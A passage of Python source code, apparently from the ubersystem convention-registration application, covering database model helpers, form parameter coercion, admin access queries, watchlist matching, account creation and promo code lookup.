This allows us to use 'x in y' searching for\n MultiChoice columns.\n\n These arguments are supplied by the @suffix_property decorator based\n on the variable name preceding '_ints'.\n\n Args:\n name: The name of the column we're inspecting, e.g., \"interests\".\n val: The list of tuples the column uses as possible values,\n e.g., \"c.INTEREST_OPTS\".\n\n Returns:\n A list of integers or an empty list if val is falsey.\n\n \"\"\"\n if not val or not name:\n return []\n\n choices = dict(self.get_field(name).type.choices)\n val = self.get_field(name).type.convert_if_labels(val)\n return [int(i) for i in str(val).split(',') if i and int(i) in choices]\n\n @suffix_property\n def _label(self, name, val):\n if not val or not name:\n return ''\n\n try:\n val = int(val)\n except ValueError:\n log.debug('{} is not an int. Did we forget to migrate data for {} during a DB migration?', val, name)\n return ''\n\n if val == -1:\n return \"Unknown\"\n\n label = self.get_field(name).type.choices.get(val)\n if not label:\n log.debug('{} does not have a label for {}, check your enum generating code', name, val)\n return ''\n return label\n\n @suffix_property\n def _local(self, name, val):\n return val.astimezone(c.EVENT_TIMEZONE)\n\n @suffix_property\n def _labels(self, name, val):\n ints = getattr(self, name + '_ints')\n labels = dict(self.get_field(name).type.choices)\n return sorted(labels[i] for i in ints)\n\n def __getattr__(self, name):\n suffixed = suffix_property.check(self, name)\n if suffixed is not None:\n return suffixed\n\n choice = getattr(c, name, None)\n if choice is not None:\n if len(self.multichoice_columns) == 1:\n multi = self.multichoice_columns[0]\n if choice in multi.type.choices_dict:\n return choice in getattr(self, multi.name + '_ints')\n\n if name.startswith('is_'):\n return self.__class__.__name__.lower() == name[3:]\n \n if name.startswith('default_') and name.endswith('_cost'):\n if self.active_receipt:\n log.error('Cost property {} was called for object {}, which has an active receipt. This may cause problems.'.format(name, self))\n\n receipt_items = uber.receipt_items.cost_calculation.items\n try:\n cost_calc = receipt_items[self.__class__.__name__][name[8:]](self)\n if not cost_calc:\n return 0\n\n try:\n return sum(item[0] * item[1] for item in cost_calc[1].items()) / 100\n except AttributeError:\n if len(cost_calc) > 3:\n return cost_calc[1] * cost_calc[3] / 100\n else:\n return cost_calc[1] / 100\n except Exception:\n pass\n\n raise AttributeError(self.__class__.__name__ + '.' 
+ name)\n\n def get_tracking_by_instance(self, instance, action, last_only=True):\n from uber.models.tracking import Tracking\n query = self.session.query(Tracking).filter_by(fk_id=instance.id, action=action).order_by(Tracking.when.desc())\n return query.first() if last_only else query.all()\n\n def coerce_column_data(self, column, value):\n if isinstance(value, six.string_types):\n value = value.strip()\n\n try:\n if value is None:\n return # Totally fine for value to be None\n\n elif value == '' and isinstance(column.type, (Float, Numeric, Choice, Integer, UTCDateTime, Date)):\n return None\n\n elif isinstance(column.type, Boolean):\n if isinstance(value, six.string_types):\n return value.strip().lower() not in ('f', 'false', 'n', 'no', '0')\n return bool(value)\n\n elif isinstance(column.type, Float):\n return float(value)\n\n elif isinstance(column.type, Numeric):\n if isinstance(value, six.string_types) and value.endswith('.0'):\n return int(value[:-2])\n else:\n return int(float(value))\n\n elif isinstance(column.type, (MultiChoice)):\n if isinstance(value, list):\n value = ','.join(map(lambda x: str(x).strip(), value))\n else:\n value = str(value).strip()\n return column.type.convert_if_labels(value)\n\n elif isinstance(column.type, Choice):\n return column.type.convert_if_label(value)\n\n elif isinstance(column.type, Integer):\n value = int(float(value))\n\n elif isinstance(column.type, UTCDateTime):\n try:\n value = datetime.strptime(value, c.TIMESTAMP_FORMAT)\n except ValueError:\n value = dateparser.parse(value)\n\n if not value.tzinfo:\n return c.EVENT_TIMEZONE.localize(value)\n else:\n return value\n\n elif isinstance(column.type, Date):\n try:\n value = datetime.strptime(value, c.DATE_FORMAT)\n except ValueError:\n value = dateparser.parse(value)\n return value.date()\n\n elif isinstance(column.type, JSONB) and isinstance(value, str):\n return json.loads(value)\n\n except Exception as error:\n log.debug(\n 'Ignoring error coercing value for column {}.{}: {}', self.__tablename__, column.name, error)\n return value\n\n def apply(self, params, *, bools=(), checkgroups=(), restricted=True, ignore_csrf=True):\n \"\"\"\n Args:\n restricted (bool): If True, restrict any changes only to fields\n which we allow attendees to set on their own. 
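# A minimal standalone sketch of the type-directed coercion pattern used by
# coerce_column_data above, assuming only stock SQLAlchemy types (the real
# method also handles uber-specific Choice/MultiChoice/UTCDateTime columns):
from sqlalchemy import Boolean, Float, Integer

def coerce_value(column_type, raw):
    # Empty strings mean "no value" for numeric columns
    if raw == '' and isinstance(column_type, (Integer, Float)):
        return None
    if isinstance(column_type, Boolean):
        # Same falsy-string convention as the method above
        return str(raw).strip().lower() not in ('f', 'false', 'n', 'no', '0')
    if isinstance(column_type, Integer):
        return int(float(raw))  # tolerates form values like '12.0'
    if isinstance(column_type, Float):
        return float(raw)
    return raw

assert coerce_value(Boolean(), 'No') is False
assert coerce_value(Integer(), '12.0') == 12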
If False, allow\n changes to any fields.\n \"\"\"\n bools = self.regform_bools if restricted else bools\n checkgroups = self.regform_checkgroups if restricted else checkgroups\n for column in self.__table__.columns:\n if (not restricted or column.name in self.unrestricted) and column.name in params and column.name != 'id':\n value = params[column.name]\n setattr(self, column.name, self.coerce_column_data(column, value))\n\n for column in self.__table__.columns:\n if (not restricted or column.name in self.unrestricted) \\\n and (column.type is JSON or isinstance(column.type, JSON)):\n\n fields = getattr(self, '_{}_fields'.format(column.name), {})\n for field in fields.keys():\n if field in params:\n setattr(self, field, params[field])\n\n if cherrypy.request.method.upper() == 'POST':\n for column in self.__table__.columns:\n if column.name in bools:\n setattr(self, column.name, bool(int(params.get(column.name, 0))))\n elif column.name in checkgroups and column.name not in params:\n setattr(self, column.name, '')\n\n if not ignore_csrf:\n check_csrf(params.get('csrf_token'))\n\n _extra_apply_attrs = self._extra_apply_attrs_restricted if restricted else self._extra_apply_attrs\n\n for attr in _extra_apply_attrs:\n if attr in params:\n setattr(self, attr, params[attr])\n\n return self\n\n def timespan(self, minute_increment=1):\n def minutestr(dt):\n return '' if dt.minute == 0 else dt.strftime(':%M')\n\n timespan = timedelta(minutes=minute_increment * self.duration)\n endtime = self.start_time_local + timespan\n\n startstr = self.start_time_local.strftime('%I').lstrip('0') + minutestr(self.start_time_local)\n endstr = endtime.strftime('%I').lstrip('0') + minutestr(endtime) + endtime.strftime('%p').lower()\n\n if self.start_time_local.day == endtime.day:\n endstr += endtime.strftime(' %A')\n if self.start_time_local.hour < 12 and endtime.hour >= 12:\n return startstr + 'am - ' + endstr\n else:\n return startstr + '-' + endstr\n else:\n return startstr + self.start_time_local.strftime('pm %a - ') + endstr + endtime.strftime(' %a')\n\n\n# Make all of our model classes available from uber.models\nfrom uber.models.admin import * # noqa: F401,E402,F403\nfrom uber.models.promo_code import * # noqa: F401,E402,F403\nfrom uber.models.attendee import * # noqa: F401,E402,F403\nfrom uber.models.badge_printing import * # noqa: F401,E402,F403\nfrom uber.models.commerce import * # noqa: F401,E402,F403\nfrom uber.models.department import * # noqa: F401,E402,F403\nfrom uber.models.email import * # noqa: F401,E402,F403\nfrom uber.models.group import * # noqa: F401,E402,F403\nfrom uber.models.legal import * # noqa: F401,E402,F403\nfrom uber.models.tracking import * # noqa: F401,E402,F403\nfrom uber.models.types import * # noqa: F401,E402,F403\nfrom uber.models.api import * # noqa: F401,E402,F403\nfrom uber.models.hotel import * # noqa: F401,E402,F403\nfrom uber.models.attendee_tournaments import * # noqa: F401,E402,F403\nfrom uber.models.marketplace import * # noqa: F401,E402,F403\nfrom uber.models.mivs import * # noqa: F401,E402,F403\nfrom uber.models.mits import * # noqa: F401,E402,F403\nfrom uber.models.panels import * # noqa: F401,E402,F403\nfrom uber.models.attraction import * # noqa: F401,E402,F403\nfrom uber.models.tabletop import * # noqa: F401,E402,F403\nfrom uber.models.guests import * # noqa: F401,E402,F403\nfrom uber.models.art_show import * # noqa: F401,E402,F403\n\n# Explicitly import models used by the Session class to quiet flake8\nfrom uber.models.admin import AccessGroup, AdminAccount, 
WatchList # noqa: E402\nfrom uber.models.art_show import ArtShowApplication  # noqa: E402\nfrom uber.models.attendee import Attendee  # noqa: E402\nfrom uber.models.department import Job, Shift, Department  # noqa: E402\nfrom uber.models.email import Email  # noqa: E402\nfrom uber.models.group import Group  # noqa: E402\nfrom uber.models.mits import MITSApplicant, MITSTeam  # noqa: E402\nfrom uber.models.mivs import IndieJudge, IndieGame, IndieStudio  # noqa: E402\nfrom uber.models.panels import PanelApplication, PanelApplicant  # noqa: E402\nfrom uber.models.promo_code import PromoCode, PromoCodeGroup  # noqa: E402\nfrom uber.models.tabletop import TabletopEntrant, TabletopTournament  # noqa: E402\nfrom uber.models.tracking import Tracking  # noqa: E402\n\n\nclass Session(SessionManager):\n    # This looks strange, but `sqlalchemy.create_engine` will throw an error\n    # if it's passed arguments that aren't supported by the given DB engine.\n    # For example, SQLite doesn't support either `pool_size` or `max_overflow`,\n    # so if `sqlalchemy_pool_size` or `sqlalchemy_max_overflow` are set with\n    # a value of -1, they are not added to the keyword args.\n    _engine_kwargs = dict((k, v) for (k, v) in [\n        ('pool_size', c.SQLALCHEMY_POOL_SIZE),\n        ('max_overflow', c.SQLALCHEMY_MAX_OVERFLOW),\n        ('pool_pre_ping', True),\n        ('pool_recycle', c.SQLALCHEMY_POOL_RECYCLE)] if v > -1)\n    engine = sqlalchemy.create_engine(c.SQLALCHEMY_URL, **_engine_kwargs)\n\n    @classmethod\n    def initialize_db(cls, modify_tables=False, drop=False, initialize=False):\n        \"\"\"\n        Initialize the database and optionally create/drop tables.\n\n        Initializes the database connection for use and attempts to create any\n        tables registered in our metadata which do not actually exist yet in\n        the database.\n\n        This calls the underlying sideboard function, HOWEVER, in order to\n        actually create any tables, you must specify modify_tables=True. The\n        reason is that we need to wait for all models from all plugins to\n        insert their mixin data, so we defer table creation to this one spot.\n\n        Any calls to initialize_db() that do not specify modify_tables=True or\n        drop=True are ignored.\n\n        I.e. anywhere in Sideboard that calls initialize_db() will be ignored;\n        ubersystem forces all calls that don't specify modify_tables=True or\n        drop=True to be ignored.\n\n        Calling initialize_db with modify_tables=False and drop=True will leave\n        you with an empty database.\n\n        Keyword Arguments:\n            modify_tables: If False, this function will not attempt to create\n                any database objects (tables, columns, constraints, etc...)\n                Defaults to False.\n            drop: USE WITH CAUTION: If True, then we will drop any tables in\n                the database. 
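# The _engine_kwargs filtering above can be sketched on its own: options set
# to -1 in config are simply omitted, so engines that don't support them
# (e.g. SQLite and pool_size) never receive them. Names here are illustrative:
config = {'pool_size': 5, 'max_overflow': -1, 'pool_recycle': 3600}
engine_kwargs = {k: v for k, v in config.items() if v > -1}
assert engine_kwargs == {'pool_size': 5, 'pool_recycle': 3600}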
Defaults to False.\n        \"\"\"\n        for model in cls.all_models():\n            if not hasattr(cls.SessionMixin, model.__tablename__):\n                setattr(cls.SessionMixin, model.__tablename__, _make_getter(model))\n\n        if drop or modify_tables or initialize:\n            super(Session, cls).initialize_db(drop=drop, create=modify_tables)\n            if drop:\n                from uber.migration import stamp\n                stamp('heads' if modify_tables else None)\n\n    class QuerySubclass(Query):\n        @property\n        def is_single_table_query(self):\n            return len(self.column_descriptions) == 1\n\n        @property\n        def model(self):\n            assert self.is_single_table_query, \\\n                'actions such as .order() and .icontains() and .iexact() are only valid for single-table queries'\n\n            return self.column_descriptions[0]['type']\n\n        def order(self, attrs):\n            order = []\n            for attr in listify(attrs):\n                col = getattr(self.model, attr.lstrip('-'))\n                order.append(col.desc() if attr.startswith('-') else col)\n            return self.order_by(*order)\n\n        def icontains_condition(self, attr=None, val=None, **filters):\n            \"\"\"\n            Take column names and values, and build a condition/expression\n            that is true when all named columns contain the corresponding\n            values, case-insensitive.\n\n            This operation is very similar to the \"contains\" method in\n            SQLAlchemy, but case-insensitive - i.e. it uses \"ilike\" instead\n            of \"like\".\n\n            Note that an \"and\" is used: all columns must match, not just one.\n            More complex conditions can be built by using or_/etc on the result\n            of this method.\n            \"\"\"\n            conditions = []\n            if len(self.column_descriptions) == 1 and filters:\n                for colname, val in filters.items():\n                    conditions.append(getattr(self.model, colname).ilike('%{}%'.format(val)))\n            if attr and val:\n                conditions.append(attr.ilike('%{}%'.format(val)))\n            return and_(*conditions)\n\n        def icontains(self, attr=None, val=None, **filters):\n            \"\"\"\n            Takes the names of columns and values, and filters the query to\n            items where each named column contains the corresponding value,\n            case-insensitive.\n\n            This operation is very similar to calling\n            query.filter(contains(...)), but works with a case-insensitive\n            \"contains\".\n\n            Note that an \"and\" is used: all columns must match, not just one.\n            \"\"\"\n            condition = self.icontains_condition(attr=attr, val=val, **filters)\n            return self.filter(condition)\n\n        def iexact(self, **filters):\n            filters = [func.lower(getattr(self.model, attr)) == func.lower(val) for attr, val in filters.items()]\n            return self.filter(*filters)\n\n    class SessionMixin:\n        def current_admin_account(self):\n            if getattr(cherrypy, 'session', {}).get('account_id'):\n                return self.admin_account(cherrypy.session.get('account_id'))\n\n        def admin_attendee(self):\n            if getattr(cherrypy, 'session', {}).get('account_id'):\n                return self.admin_account(cherrypy.session.get('account_id')).attendee\n\n        def current_attendee_account(self):\n            if c.ATTENDEE_ACCOUNTS_ENABLED and getattr(cherrypy, 'session', {}).get('attendee_account_id'):\n                try:\n                    return self.attendee_account(cherrypy.session.get('attendee_account_id'))\n                except sqlalchemy.orm.exc.NoResultFound:\n                    cherrypy.session['attendee_account_id'] = ''\n        \n        def get_attendee_account_by_attendee(self, attendee):\n            logged_in_account = self.current_attendee_account()\n            if not logged_in_account:\n                return\n            \n            attendee_accounts = attendee.managers\n            if logged_in_account in attendee_accounts:\n                return logged_in_account\n            elif len(attendee.managers) == 1:\n                return attendee.managers[0]\n\n        def logged_in_volunteer(self):\n            return self.attendee(cherrypy.session.get('staffer_id'))\n\n        def 
admin_has_staffer_access(self, staffer, access=\"view\"):\n admin = self.current_admin_account()\n if admin.full_shifts_admin:\n return True\n \n dept_ids_with_inherent_role = [dept_m.department_id for dept_m in \n admin.attendee.dept_memberships_with_inherent_role]\n return set(staffer.assigned_depts_ids).intersection(dept_ids_with_inherent_role)\n\n def admin_can_see_guest_group(self, guest):\n return guest.group_type_label.upper().replace(' ','_') in self.current_admin_account().viewable_guest_group_types\n\n def admin_attendee_max_access(self, attendee, read_only=True):\n admin = self.current_admin_account()\n if not admin:\n return\n \n if admin.full_registration_admin or attendee.creator == admin.attendee or \\\n attendee == admin.attendee or attendee.is_new:\n return AccessGroup.FULL\n \n if attendee.access_sections:\n return max([admin.max_level_access(section, read_only=read_only) for section in attendee.access_sections])\n\n def admin_can_create_attendee(self, attendee):\n admin = self.current_admin_account()\n if not admin:\n return\n \n if admin.full_registration_admin:\n return True\n \n return admin.full_shifts_admin if attendee.badge_type == c.STAFF_BADGE else \\\n self.admin_attendee_max_access(attendee) >= AccessGroup.DEPT\n \n def viewable_groups(self):\n from uber.models import Attendee, DeptMembership, Group, GuestGroup\n admin = self.current_admin_account()\n \n if admin.full_registration_admin:\n return self.query(Group)\n \n subqueries = [self.query(Group).filter(Group.creator == admin.attendee)]\n \n group_id = admin.attendee.group.id if admin.attendee.group else ''\n if group_id:\n subqueries.append(self.query(Group).filter(Group.id == group_id))\n \n for key, val in c.GROUP_TYPE_OPTS:\n if val.lower() + '_admin' in admin.read_or_write_access_set:\n subqueries.append(\n self.query(Group).join(\n GuestGroup, Group.id == GuestGroup.group_id).filter(GuestGroup.group_type == key\n )\n )\n \n if 'dealer_admin' in admin.read_or_write_access_set:\n subqueries.append(\n self.query(Group).filter(Group.is_dealer)\n )\n \n return subqueries[0].union(*subqueries[1:])\n \n def access_query_matrix(self):\n \"\"\"\n There's a few different situations where we want to add certain subqueries to find attendees\n based on different site sections. 
This matrix returns queries keyed by site section.\n \"\"\"\n admin = self.current_admin_account()\n return_dict = {'created': self.query(Attendee).filter(\n or_(Attendee.creator == admin.attendee, Attendee.id == admin.attendee.id))}\n # Guest groups\n for group_type, badge_and_ribbon_filter in [\n (c.BAND, and_(Attendee.badge_type == c.GUEST_BADGE, Attendee.ribbon.contains(c.BAND))),\n (c.GUEST, and_(Attendee.badge_type == c.GUEST_BADGE, ~Attendee.ribbon.contains(c.BAND)))\n ]:\n return_dict[c.GROUP_TYPES[group_type].lower() + '_admin'] = (\n self.query(Attendee).join(Group, Attendee.group_id == Group.id)\n .join(GuestGroup, Group.id == GuestGroup.group_id).filter(\n or_(\n or_(\n badge_and_ribbon_filter,\n and_(\n Group.id == Attendee.group_id,\n GuestGroup.group_id == Group.id,\n GuestGroup.group_type == group_type,\n )\n )\n )\n )\n )\n \n return_dict['panels_admin'] = self.query(Attendee).outerjoin(PanelApplicant).filter(\n or_(Attendee.ribbon.contains(c.PANELIST_RIBBON),\n Attendee.panel_applications != None,\n Attendee.assigned_panelists != None,\n Attendee.panel_applicants != None,\n Attendee.panel_feedback != None))\n return_dict['dealer_admin'] = self.query(Attendee).join(Group, Attendee.group_id == Group.id).filter(Attendee.is_dealer)\n return_dict['mits_admin'] = self.query(Attendee).join(MITSApplicant).filter(Attendee.mits_applicants)\n return_dict['mivs_admin'] = (self.query(Attendee).join(Group, Attendee.group_id == Group.id)\n .join(GuestGroup, Group.id == GuestGroup.group_id).filter(\n and_(Group.id == Attendee.group_id, GuestGroup.group_id == Group.id, GuestGroup.group_type == c.MIVS)\n ))\n return_dict['art_show_admin'] = self.query(Attendee\n ).outerjoin(\n ArtShowApplication, \n or_(ArtShowApplication.attendee_id == Attendee.id,\n ArtShowApplication.agent_id == Attendee.id)\n ).outerjoin(ArtShowBidder).filter(\n or_(Attendee.art_show_bidder != None,\n Attendee.art_show_purchases != None,\n Attendee.art_show_applications != None,\n Attendee.art_agent_applications != None)\n )\n return return_dict\n \n def viewable_attendees(self):\n from uber.models import Attendee, DeptMembership, Group, GuestGroup, MITSApplicant\n admin = self.current_admin_account()\n \n if admin.full_registration_admin:\n return self.query(Attendee)\n \n subqueries = [self.access_query_matrix()['created']]\n \n for key, val in self.access_query_matrix().items():\n if key in admin.read_or_write_access_set:\n subqueries.append(val)\n \n if admin.full_shifts_admin:\n subqueries.append(\n self.query(Attendee).filter(Attendee.staffing)\n )\n \n return subqueries[0].union(*subqueries[1:])\n\n def checklist_status(self, slug, department_id):\n attendee = self.admin_attendee()\n conf = DeptChecklistConf.instances.get(slug)\n if not conf:\n raise ValueError(\n \"Can't access dept checklist INI settings for section '{}', check your INI file\".format(slug))\n\n if not department_id:\n return {'conf': conf, 'relevant': False, 'completed': None}\n\n department = self.query(Department).get(department_id)\n if department:\n return {\n 'conf': conf,\n 'relevant': attendee.can_admin_checklist_for(department),\n 'completed': department.checklist_item_for_slug(conf.slug)\n }\n else:\n return {\n 'conf': conf,\n 'relevant': attendee.can_admin_checklist,\n 'completed': attendee.checklist_item_for_slug(conf.slug)\n }\n\n def jobs_for_signups(self, all=False):\n fields = [\n 'name', 'department_id', 'department_name', 'description',\n 'weight', 'start_time_local', 'end_time_local', 'duration',\n 'weighted_hours', 
'restricted', 'extra15', 'taken',\n 'visibility', 'is_public', 'is_setup', 'is_teardown']\n jobs = self.logged_in_volunteer().possible_and_current\n restricted_minutes = set()\n for job in jobs:\n if job.required_roles:\n restricted_minutes.add(frozenset(job.minutes))\n if all:\n return [job.to_dict(fields) for job in jobs]\n return [\n job.to_dict(fields)\n for job in jobs if (job.required_roles or frozenset(job.minutes) not in restricted_minutes)]\n\n def possible_match_list(self):\n possibles = defaultdict(list)\n for a in self.valid_attendees():\n possibles[a.email.lower()].append(a)\n possibles[a.first_name, a.last_name].append(a)\n return possibles\n\n def guess_attendee_watchentry(self, attendee, active=True):\n \"\"\"\n Finds all watchlist entries that match a given attendee.\n Only active entries are matched. Watchlist entries with confirmed attendees\n are still matched to attendees -- otherwise attendees could dodge bans just by\n registering twice.\n\n A watchlist entry is considered a match if both of the following are true:\n a) one of the entry's first names or its last name matches the attendee's\n b) the entry's email address or date of birth matches the attendee's\n\n Because this could be run while in the middle of creating an attendee, we\n need to do several checks on how the attendee's DOB might be formatted.\n \"\"\"\n or_clauses = [\n and_(\n WatchList.email != '',\n func.lower(WatchList.email) == attendee.email.lower())]\n\n if attendee.birthdate:\n if isinstance(attendee.birthdate, six.string_types):\n try:\n birthdate = dateparser.parse(attendee.birthdate).date()\n except Exception:\n log.debug('Error parsing attendee birthdate: {}'.format(attendee.birthdate))\n else:\n or_clauses.append(WatchList.birthdate == birthdate)\n elif isinstance(attendee.birthdate, datetime):\n or_clauses.append(WatchList.birthdate == attendee.birthdate.date())\n elif isinstance(attendee.birthdate, date):\n or_clauses.append(WatchList.birthdate == attendee.birthdate)\n\n return self.query(WatchList).filter(and_(\n or_(func.lower(WatchList.first_names).contains(attendee.first_name.lower()),\n func.lower(WatchList.last_name) == attendee.last_name.lower()),\n or_(*or_clauses),\n WatchList.active == active)).all() # noqa: E712\n\n def guess_watchentry_attendees(self, entry):\n return self.query(Attendee).filter(\n or_(func.lower(Attendee.first_name).in_(entry.first_name_list),\n func.lower(Attendee.last_name) == entry.last_name.lower()),\n or_(and_(\n Attendee.email != '',\n func.lower(Attendee.email) == entry.email.lower()\n ),\n and_(\n Attendee.birthdate != None,\n Attendee.birthdate == entry.birthdate\n ),\n ),\n Attendee.watchlist_id == None).all()\n\n def get_attendee_account_by_email(self, email):\n return self.query(AttendeeAccount).filter_by(normalized_email=normalize_email_legacy(email)).one()\n\n def get_admin_account_by_email(self, email):\n from uber.utils import normalize_email_legacy\n return self.query(AdminAccount).join(Attendee).filter(Attendee.normalized_email == normalize_email_legacy(email)).one()\n\n def no_email(self, subject):\n return not self.query(Email).filter_by(subject=subject).all()\n\n def lookup_attendee(self, first_name, last_name, email, zip_code):\n attendees = self.query(Attendee).iexact(\n first_name=first_name,\n last_name=last_name,\n zip_code=zip_code\n ).filter(\n Attendee.normalized_email == normalize_email_legacy(email),\n Attendee.is_valid == True\n ).limit(10).all()\n\n if attendees:\n statuses = defaultdict(lambda: six.MAXSIZE, {\n 
c.COMPLETED_STATUS: 0,\n c.NEW_STATUS: 1,\n c.REFUNDED_STATUS: 2,\n c.DEFERRED_STATUS: 3,\n c.WATCHED_STATUS: 4,\n c.UNAPPROVED_DEALER_STATUS: 5,\n c.NOT_ATTENDING: 6})\n\n attendees = sorted(\n attendees, key=lambda a: statuses[a.badge_status])\n return attendees[0]\n\n raise ValueError('Attendee not found')\n\n def create_or_find_attendee_by_id(self, **params):\n message = ''\n if params.get('attendee_id', ''):\n try:\n attendee = self.attendee(id=params['attendee_id'])\n except Exception:\n try:\n attendee = self.attendee(public_id=params['attendee_id'])\n except Exception:\n return \\\n None, \\\n 'The confirmation number you entered is not valid, ' \\\n 'or there is no matching badge.'\n\n if not attendee.is_valid:\n return None, \\\n 'This badge is invalid. Please contact registration.'\n else:\n attendee_params = {\n attr: params.get(attr, '')\n for attr in ['first_name', 'last_name', 'email']}\n attendee = self.attendee(attendee_params, restricted=True,\n ignore_csrf=True)\n attendee.placeholder = True\n if not params.get('email', ''):\n message = 'Email address is a required field.'\n elif c.ATTENDEE_ACCOUNTS_ENABLED:\n if self.current_attendee_account():\n self.add_attendee_to_account(attendee, self.current_attendee_account())\n else:\n password = params.get('account_password')\n if password and password != params.get('confirm_password'):\n message = 'Password confirmation does not match.'\n else:\n message = valid_password(password) or valid_email(params.get('email', ''))\n if not message:\n new_account = self.create_attendee_account(params.get('email', ''), password=password)\n self.add_attendee_to_account(attendee, new_account)\n cherrypy.session['attendee_account_id'] = new_account.id\n return attendee, message\n\n def create_admin_account(self, attendee, password='', generate_pwd=True, **params):\n from uber.utils import genpasswd\n\n if not password and generate_pwd:\n password = genpasswd()\n \n new_account = AdminAccount(attendee=attendee, hashed=bcrypt.hashpw(password, bcrypt.gensalt()))\n if 'judge' in params:\n new_account.judge = params.pop('judge')\n new_account.apply(params)\n self.add(new_account)\n return new_account\n\n def create_attendee_account(self, email=None, password=None):\n from uber.models import AttendeeAccount\n from uber.utils import normalize_email\n\n new_account = AttendeeAccount(email=normalize_email(email), hashed=bcrypt.hashpw(password, bcrypt.gensalt()) if password else '')\n self.add(new_account)\n\n return new_account\n\n def add_attendee_to_account(self, attendee, account):\n from uber.utils import normalize_email\n\n unclaimed_account = account.hashed != '' and not account.is_sso_account\n\n if c.ONE_MANAGER_PER_BADGE and attendee.managers and not unclaimed_account:\n attendee.managers.clear()\n if attendee not in account.attendees:\n account.attendees.append(attendee)\n\n def match_attendee_to_account(self, attendee):\n existing_account = self.query(AttendeeAccount).filter_by(normalized_email=normalize_email_legacy(attendee.email)).first()\n if existing_account:\n self.add_attendee_to_account(attendee, existing_account)\n\n def get_receipt_by_model(self, model, include_closed=False, create_if_none=\"\"):\n receipt_select = self.query(ModelReceipt).filter_by(owner_id=model.id, owner_model=model.__class__.__name__)\n if not include_closed:\n receipt_select = receipt_select.filter(ModelReceipt.closed == None)\n receipt = receipt_select.first()\n\n if not receipt and create_if_none:\n receipt, receipt_items = 
ReceiptManager.create_new_receipt(model, create_model=True)\n\n self.add(receipt)\n if create_if_none != \"BLANK\":\n self.add_all(receipt_items)\n self.commit()\n return receipt\n\n def get_model_by_receipt(self, receipt):\n cls = getattr(uber.models, receipt.owner_model)\n if cls:\n return self.query(cls).filter_by(id=receipt.owner_id).first()\n\n def refresh_receipt_and_model(self, model):\n receipt = self.get_receipt_by_model(model)\n if receipt:\n for txn in receipt.pending_txns:\n txn.check_paid_from_stripe()\n self.refresh(receipt)\n \n try:\n self.refresh(model)\n except sqlalchemy.exc.InvalidRequestError:\n # Non-persistent object, so nothing to refresh\n pass\n return receipt\n\n def attendee_from_marketplace_app(self, **params):\n attendee, message = self.create_or_find_attendee_by_id(**params)\n if message:\n return attendee, message\n elif attendee.marketplace_applications:\n return attendee, \\\n 'There is already a marketplace application ' \\\n 'for that badge!'\n\n return attendee, message\n \n def attendee_from_art_show_app(self, **params):\n attendee, message = self.create_or_find_attendee_by_id(**params)\n if message:\n return attendee, message\n elif attendee.art_show_applications:\n return attendee, \\\n 'There is already an art show application ' \\\n 'for that badge!'\n\n if params.get('not_attending', ''):\n attendee.badge_status = c.NOT_ATTENDING\n\n return attendee, ''\n\n def lookup_agent_code(self, code):\n return self.query(ArtShowApplication).filter_by(agent_code=code).all()\n\n def add_promo_code_to_attendee(self, attendee, code, used_codes=defaultdict(int)):\n \"\"\"\n Convenience method for adding a promo code to an attendee.\n\n This method sets both the `promo_code` and `promo_code_id`\n properties of `attendee`. 
Due to the way the `Attendee.promo_code`\n relationship is defined, the `Attendee.promo_code_id` isn't\n automatically set, which makes this method a nice way of setting\n both.\n\n Arguments:\n attendee (Attendee): The Attendee for which the promo code\n should be added.\n code (str): The promo code as typed by an end user, or an\n empty string to unset the promo code.\n used_codes (defaultdict(int)): A list of codes already used\n but not added to the session, e.g., in PreregCart.\n These codes are flattened to the list, as they're only\n used here to check for used PromoCodeGroup codes.\n\n Returns:\n str: Either a failure message or an empty string\n indicating success.\n \"\"\"\n code = code.strip() if code else ''\n if code:\n attendee.promo_code = self.lookup_promo_code(code, list(used_codes.keys()))\n if attendee.promo_code:\n attendee.promo_code_id = attendee.promo_code.id\n return ''\n else:\n attendee.promo_code_id = None\n return 'The promo code you entered is invalid.'\n else:\n attendee.promo_code = None\n attendee.promo_code_id = None\n return ''\n\n def lookup_promo_code(self, code, used_codes=[]):\n \"\"\"\n Convenience method for finding a promo code by id or code.\n Accounts for PromoCodeGroups.\n\n Arguments:\n code (str): The id or code to search for.\n\n Returns:\n PromoCode: A PromoCode object, either matching\n the given code or found in the matching PromoCodeGroup.\n \"\"\"\n promo_code = self.lookup_promo_or_group_code(code, PromoCode)\n if promo_code:\n return promo_code\n\n group = self.lookup_promo_or_group_code(code, PromoCodeGroup)\n if group:\n unused_valid_codes = [code for code in group.valid_codes if code.code not in used_codes]\n return unused_valid_codes[0] if unused_valid_codes else None\n\n def lookup_promo_or_group_code(self, code, model=PromoCode):\n \"\"\"\n Convenience method for finding a promo code by id or code.\n\n Arguments:\n model: Either PromoCode or PromoCodeGroup\n code (str): The id or code to search for.\n\n Returns:\n Either the matching object of the given model,\n or None if not found.\n \"\"\"\n if isinstance(code, uuid.UUID):\n code = code.hex\n\n normalized_code = PromoCode.normalize_code(code)\n if not normalized_code:\n return None\n\n unambiguous_code = PromoCode.disambiguate_code(code)\n clause = or_(model.normalized_code == normalized_code, model.normalized_code == unambiguous_code)\n\n # Make sure that code is a valid UUID before adding\n # PromoCode.id to the filter clause\n try:\n promo_code_id = uuid.UUID(normalized_code).hex\n except Exception:\n pass\n else:\n clause = clause.or_(model.id == promo_code_id)\n\n return self.query(model).filter(clause).order_by(model.normalized_code.desc()).first()\n\n def create_promo_code_group(self, attendee, name, badges, cost=None):\n pc_group = PromoCodeGroup(name=name, buyer=attendee)\n\n self.add_codes_to_pc_group(pc_group, badges, cost)\n\n return pc_group\n\n def add_codes_to_pc_group(self, pc_group, badges, cost=None):\n cost = c.get_group_price() if cost is None else cost\n for _ in range(badges):\n self.add(PromoCode(\n discount=0,\n discount_type=PromoCode._FIXED_PRICE,\n uses_allowed=1,\n group=pc_group,\n cost=cost))\n \n def remove_codes_from_pc_group(self, pc_group, badges):\n codes = sorted(pc_group.promo_codes, key=lambda x: x.cost, reverse=True)\n for _ in range(badges):\n code = codes.pop()\n self.delete(code)\n pc_group.promo_codes.remove(code)\n\n def add_to_print_queue(self, attendee, printer_id, reg_station, print_fee=None, dry_run=False):\n from uber.models 
